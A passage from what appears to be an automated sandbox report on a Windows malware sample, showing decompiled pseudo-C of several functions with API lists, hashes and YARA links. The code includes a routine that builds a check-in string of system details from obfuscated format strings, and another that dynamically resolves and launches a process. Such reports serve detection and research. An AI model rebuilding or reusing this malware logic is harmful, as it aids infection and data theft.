				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E100022EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E100023A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E10002290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E100022EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E10002387(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                          0x10002188
                                                          0x10002189
                                                          0x1000218a
                                                          0x1000218d
                                                          0x1000218f
                                                          0x10002192
                                                          0x10002193
                                                          0x10002195
                                                          0x10002196
                                                          0x10002197
                                                          0x1000219a
                                                          0x100021a4
                                                          0x10002255
                                                          0x1000225c
                                                          0x10002265
                                                          0x100021aa
                                                          0x100021aa
                                                          0x100021b0
                                                          0x100021b6
                                                          0x100021b9
                                                          0x100021bc
                                                          0x100021c0
                                                          0x100021c5
                                                          0x100021ca
                                                          0x1000224a
                                                          0x00000000
                                                          0x100021cc
                                                          0x100021cc
                                                          0x100021d8
                                                          0x100021da
                                                          0x10002235
                                                          0x10002235
                                                          0x1000223b
                                                          0x00000000
                                                          0x100021dc
                                                          0x100021eb
                                                          0x100021ed
                                                          0x100021ee
                                                          0x100021ef
                                                          0x100021f2
                                                          0x100021f2
                                                          0x100021f4
                                                          0x00000000
                                                          0x100021f6
                                                          0x100021f6
                                                          0x10002240
                                                          0x100021f8
                                                          0x100021f8
                                                          0x100021fc
                                                          0x10002204
                                                          0x10002209
                                                          0x1000220e
                                                          0x1000221a
                                                          0x10002222
                                                          0x10002229
                                                          0x1000222f
                                                          0x10002233
                                                          0x00000000
                                                          0x10002233
                                                          0x100021f6
                                                          0x100021f4
                                                          0x00000000
                                                          0x100021da
                                                          0x1000224e
                                                          0x1000224e
                                                          0x1000224e
                                                          0x100021ca
                                                          0x1000226a
                                                          0x10002271

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                          • Instruction ID: adb68764e4b497ef4a4b49f2527e322eb7aaba1ac7dc589ecd7eb92557e13467
                                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                          • Instruction Fuzzy Hash: 9221CB76900205AFD710DFA8CCC09A7F7A5FF49390B468169ED599B249D730FA15C7E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005EAF80, Relevance: .1, Instructions: 77COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 71%
                                                          			E005EAF80(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E005EB0EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E005EB1A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E005EB090(_t55, _t66);
										_t89 = _t66 + 0x10;
										E005EB0EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E005EB187(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                          0x005eaf84
                                                          0x005eaf85
                                                          0x005eaf86
                                                          0x005eaf89
                                                          0x005eaf8b
                                                          0x005eaf8e
                                                          0x005eaf8f
                                                          0x005eaf91
                                                          0x005eaf92
                                                          0x005eaf93
                                                          0x005eaf96
                                                          0x005eafa0
                                                          0x005eb051
                                                          0x005eb058
                                                          0x005eb061
                                                          0x005eafa6
                                                          0x005eafa6
                                                          0x005eafac
                                                          0x005eafb2
                                                          0x005eafb5
                                                          0x005eafb8
                                                          0x005eafbc
                                                          0x005eafc1
                                                          0x005eafc6
                                                          0x005eb046
                                                          0x00000000
                                                          0x005eafc8
                                                          0x005eafc8
                                                          0x005eafd4
                                                          0x005eafd6
                                                          0x005eb031
                                                          0x005eb031
                                                          0x005eb037
                                                          0x00000000
                                                          0x005eafd8
                                                          0x005eafe7
                                                          0x005eafe9
                                                          0x005eafea
                                                          0x005eafeb
                                                          0x005eafee
                                                          0x005eafee
                                                          0x005eaff0
                                                          0x00000000
                                                          0x005eaff2
                                                          0x005eaff2
                                                          0x005eb03c
                                                          0x005eaff4
                                                          0x005eaff4
                                                          0x005eaff8
                                                          0x005eb000
                                                          0x005eb005
                                                          0x005eb00a
                                                          0x005eb016
                                                          0x005eb01e
                                                          0x005eb025
                                                          0x005eb02b
                                                          0x005eb02f
                                                          0x00000000
                                                          0x005eb02f
                                                          0x005eaff2
                                                          0x005eaff0
                                                          0x00000000
                                                          0x005eafd6
                                                          0x005eb04a
                                                          0x005eb04a
                                                          0x005eb04a
                                                          0x005eafc6
                                                          0x005eb066
                                                          0x005eb06d

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction ID: d2c891dfe34f2cdb5abcaf9bcb438b8fde74134e2f18bcad10a9530a908591cd
                                                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                          • Instruction Fuzzy Hash: B821F8729002459FEB18DF69C8C89ABBFA5FF48360B058169EDA5CB245D730FA15C7E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003D0478, Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ae04c179fc591aad29b6f3858bcf89de9e30963d532af2466741a672dbbf26e5
                                                          • Instruction ID: 153f5259ab1a04b0fee6bee9682a44f972211defaa8fc1e1418adf5a20c57bd9
                                                          • Opcode Fuzzy Hash: ae04c179fc591aad29b6f3858bcf89de9e30963d532af2466741a672dbbf26e5
                                                          • Instruction Fuzzy Hash: 8DE0B6B6901118FEFF568A44CC48FFAB7BDEBC4700F1481E2E609AA060C6315E848F20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E1F13, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 66%
                                                          			E005E1F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x5ed018; // 0xf1c1aee9
				asm("bswap eax");
				_t27 =  *0x5ed014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x5ed010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E005ED00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x5ed2a8; // 0x107a5a8
				_t3 = _t30 + 0x5ee633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x5ed02c,  *0x5ed004, _t25);
				_t33 = E005E56CD();
				_t34 =  *0x5ed2a8; // 0x107a5a8
				_t4 = _t34 + 0x5ee673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E005E58DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x5ed2a8; // 0x107a5a8
					_t6 = _t83 + 0x5ee8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x5ed238, 0, _t96);
				}
				_t97 = E005EA199();
				if(_t97 != 0) {
					_t78 =  *0x5ed2a8; // 0x107a5a8
					_t8 = _t78 + 0x5ee8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x5ed238, 0, _t97);
				}
				_t98 =  *0x5ed32c; // 0x16695b0
				_a32 = E005E4622(0x5ed00a, _t98 + 4);
				_t42 =  *0x5ed2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x5ed2a8; // 0x107a5a8
					_t11 = _t74 + 0x5ee8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x5ed2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x5ed2a8; // 0x107a5a8
					_t13 = _t71 + 0x5ee88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x5ed238, 0, 0x800);
					if(_t100 != 0) {
						E005E518F(GetTickCount());
						_t50 =  *0x5ed32c; // 0x16695b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x5ed32c; // 0x16695b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x5ed32c; // 0x16695b0
						_t103 = E005E1BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x5ec28c);
							_push(_t103);
							_t62 = E005E361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E005E6777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E005E6761();
								}
								HeapFree( *0x5ed238, 0, _v44);
							}
							HeapFree( *0x5ed238, 0, _t103);
						}
						HeapFree( *0x5ed238, 0, _t100);
					}
					HeapFree( *0x5ed238, 0, _a24);
				}
				HeapFree( *0x5ed238, 0, _t105);
				return _a12;
			}
















































                                                          0x005e1f13
                                                          0x005e1f13
                                                          0x005e1f13
                                                          0x005e1f18
                                                          0x005e1f1e
                                                          0x005e1f28
                                                          0x005e1f2a
                                                          0x005e1f2a
                                                          0x005e1f37
                                                          0x005e1f42
                                                          0x005e1f45
                                                          0x005e1f50
                                                          0x005e1f53
                                                          0x005e1f58
                                                          0x005e1f5b
                                                          0x005e1f60
                                                          0x005e1f63
                                                          0x005e1f6f
                                                          0x005e1f7c
                                                          0x005e1f7e
                                                          0x005e1f84
                                                          0x005e1f89
                                                          0x005e1f94
                                                          0x005e1f96
                                                          0x005e1f99
                                                          0x005e1fa0
                                                          0x005e1fa4
                                                          0x005e1fa6
                                                          0x005e1fab
                                                          0x005e1fb7
                                                          0x005e1fb9
                                                          0x005e1fc5
                                                          0x005e1fc7
                                                          0x005e1fc7
                                                          0x005e1fd2
                                                          0x005e1fd6
                                                          0x005e1fd8
                                                          0x005e1fdd
                                                          0x005e1fe9
                                                          0x005e1feb
                                                          0x005e1ff7
                                                          0x005e1ff9
                                                          0x005e1ff9
                                                          0x005e1fff
                                                          0x005e2012
                                                          0x005e2016
                                                          0x005e201d
                                                          0x005e2020
                                                          0x005e2025
                                                          0x005e2030
                                                          0x005e2032
                                                          0x005e2035
                                                          0x005e2035
                                                          0x005e2037
                                                          0x005e203e
                                                          0x005e2041
                                                          0x005e2046
                                                          0x005e2050
                                                          0x005e2052
                                                          0x005e205a
                                                          0x005e2073
                                                          0x005e2077
                                                          0x005e2083
                                                          0x005e2088
                                                          0x005e2091
                                                          0x005e20a2
                                                          0x005e20a6
                                                          0x005e20af
                                                          0x005e20b5
                                                          0x005e20c2
                                                          0x005e20cf
                                                          0x005e20d5
                                                          0x005e20e1
                                                          0x005e20e7
                                                          0x005e20e8
                                                          0x005e20ed
                                                          0x005e20f3
                                                          0x005e20f9
                                                          0x005e2100
                                                          0x005e2107
                                                          0x005e210d
                                                          0x005e2114
                                                          0x005e2118
                                                          0x005e2123
                                                          0x005e2128
                                                          0x005e212e
                                                          0x005e2137
                                                          0x005e2137
                                                          0x005e2148
                                                          0x005e2148
                                                          0x005e2157
                                                          0x005e2157
                                                          0x005e2166
                                                          0x005e2166
                                                          0x005e2178
                                                          0x005e2178
                                                          0x005e2187
                                                          0x005e2198

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 005E1F2A
                                                          • wsprintfA.USER32 ref: 005E1F77
                                                          • wsprintfA.USER32 ref: 005E1F94
                                                          • wsprintfA.USER32 ref: 005E1FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E1FC7
                                                          • wsprintfA.USER32 ref: 005E1FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E1FF9
                                                          • wsprintfA.USER32 ref: 005E2030
                                                          • wsprintfA.USER32 ref: 005E2050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E206D
                                                          • GetTickCount.KERNEL32 ref: 005E207D
                                                          • RtlEnterCriticalSection.NTDLL(01669570), ref: 005E2091
                                                          • RtlLeaveCriticalSection.NTDLL(01669570), ref: 005E20AF
                                                            • Part of subcall function 005E1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,005E20C2,?,016695B0), ref: 005E1BE1
                                                            • Part of subcall function 005E1BB6: lstrlen.KERNEL32(?,?,?,005E20C2,?,016695B0), ref: 005E1BE9
                                                            • Part of subcall function 005E1BB6: strcpy.NTDLL ref: 005E1C00
                                                            • Part of subcall function 005E1BB6: lstrcat.KERNEL32(00000000,?), ref: 005E1C0B
                                                            • Part of subcall function 005E1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,005E20C2,?,016695B0), ref: 005E1C28
                                                          • StrTrimA.SHLWAPI(00000000,005EC28C,?,016695B0), ref: 005E20E1
                                                            • Part of subcall function 005E361A: lstrlen.KERNEL32(01669A78,00000000,00000000,7742C740,005E20ED,00000000), ref: 005E362A
                                                            • Part of subcall function 005E361A: lstrlen.KERNEL32(?), ref: 005E3632
                                                            • Part of subcall function 005E361A: lstrcpy.KERNEL32(00000000,01669A78), ref: 005E3646
                                                            • Part of subcall function 005E361A: lstrcat.KERNEL32(00000000,?), ref: 005E3651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 005E2100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005E2107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 005E2114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 005E2118
                                                            • Part of subcall function 005E6777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 005E6829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 005E2148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 005E2157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,016695B0), ref: 005E2166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E2178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 005E2187
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 555e98fe2af4278fb8baae85627ba02bccf308ac523be135019d747a0da82d13
                                                          • Instruction ID: 782eb0810eea82271615d5bd39fd9b561a4f5e1d2eabf99e730ca008282f2d4f
                                                          • Opcode Fuzzy Hash: 555e98fe2af4278fb8baae85627ba02bccf308ac523be135019d747a0da82d13
                                                          • Instruction Fuzzy Hash: 4061AC31500281AFC7199B65EC89E5A7BB9FB58350F040514FAC4DF270EB35E80AEB76
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E8EA1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E005E8EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t69 =  *((intOrPtr*)(__eax + 0x14));
				_t36 = E005E592D(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E005EA749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x5ed260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x5ed2a8; // 0x107a5a8
					_t18 = _t47 + 0x5ee3e6; // 0x73797325
					_t68 = E005E3C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x5ed2a8; // 0x107a5a8
						_t19 = _t50 + 0x5ee747; // 0x1668cef
						_t20 = _t50 + 0x5ee0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E005EA62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E005EA62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x5ed238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E005EA734(_t70);
				goto L12;
			}


















                                                          0x005e8ea9
                                                          0x005e8eb8
                                                          0x005e8ebf
                                                          0x005e8ec4
                                                          0x005e8fd1
                                                          0x005e8fd8
                                                          0x005e8fd8
                                                          0x005e8ed3
                                                          0x005e8edb
                                                          0x005e8ede
                                                          0x005e8ee3
                                                          0x005e8ef8
                                                          0x005e8efe
                                                          0x005e8eff
                                                          0x005e8f02
                                                          0x005e8f08
                                                          0x005e8f0b
                                                          0x005e8f10
                                                          0x005e8f18
                                                          0x005e8f24
                                                          0x005e8f28
                                                          0x005e8fb8
                                                          0x005e8f2e
                                                          0x005e8f2e
                                                          0x005e8f33
                                                          0x005e8f3a
                                                          0x005e8f4e
                                                          0x005e8f52
                                                          0x005e8fa1
                                                          0x005e8f54
                                                          0x005e8f55
                                                          0x005e8f5c
                                                          0x005e8f75
                                                          0x005e8f77
                                                          0x005e8f7b
                                                          0x005e8f82
                                                          0x005e8f9c
                                                          0x005e8f84
                                                          0x005e8f8d
                                                          0x005e8f92
                                                          0x005e8f92
                                                          0x005e8f82
                                                          0x005e8fb0
                                                          0x005e8fb0
                                                          0x005e8f28
                                                          0x005e8fbf
                                                          0x005e8fc8
                                                          0x005e8fcc
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 005E592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,?,00000000,?,?,?,005E8EBD,?,00000001,?,?,00000000,00000000), ref: 005E5952
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 005E5974
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 005E598A
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 005E59A0
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 005E59B6
                                                            • Part of subcall function 005E592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 005E59CC
                                                          • memset.NTDLL ref: 005E8F0B
                                                            • Part of subcall function 005E3C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,005E8F24,73797325), ref: 005E3C59
                                                            • Part of subcall function 005E3C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 005E3C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,01668CEF,73797325), ref: 005E8F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 005E8F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 005E8FB0
                                                            • Part of subcall function 005EA62D: GetProcAddress.KERNEL32(36776F57,005EA2D4), ref: 005EA648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 005E8F8D
                                                          • CloseHandle.KERNEL32(?), ref: 005E8F92
                                                          • GetLastError.KERNEL32(00000001), ref: 005E8F96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID: `7^
                                                          • API String ID: 3075724336-2873282293
                                                          • Opcode ID: 61ae2c7946e7ccaaa03caaa5323999caed9d5e8a2c53b411743dc0d982b5fa18
                                                          • Instruction ID: 36b31ca5cf7f455d87fbbade631f48c49410c22ffc367243f915cbf022b3771e
                                                          • Opcode Fuzzy Hash: 61ae2c7946e7ccaaa03caaa5323999caed9d5e8a2c53b411743dc0d982b5fa18
                                                          • Instruction Fuzzy Hash: F3317FB5C00249EFDB18AFA5CC889AEBFB9FB44304F100465F695A7121D734AE49DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E6C38, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 27%
                                                          			E005E6C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x5ed33c; // 0x1669798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E005EA557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x5ec18c;
				}
				_t46 = E005E18A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E005EA71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x5ed2a8; // 0x107a5a8
						_t16 = _t75 + 0x5eeb08; // 0x530025
						 *0x5ed118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E005EA557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x5ec190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E005EA71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E005EA734(_v20);
						} else {
							_t66 =  *0x5ed2a8; // 0x107a5a8
							_t31 = _t66 + 0x5eec28; // 0x73006d
